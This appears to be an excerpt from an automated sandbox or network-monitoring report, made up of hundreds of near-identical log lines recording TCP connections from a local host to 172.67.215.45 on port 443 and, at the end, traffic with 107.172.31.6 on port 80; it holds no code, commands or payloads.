                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global traffic  TCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
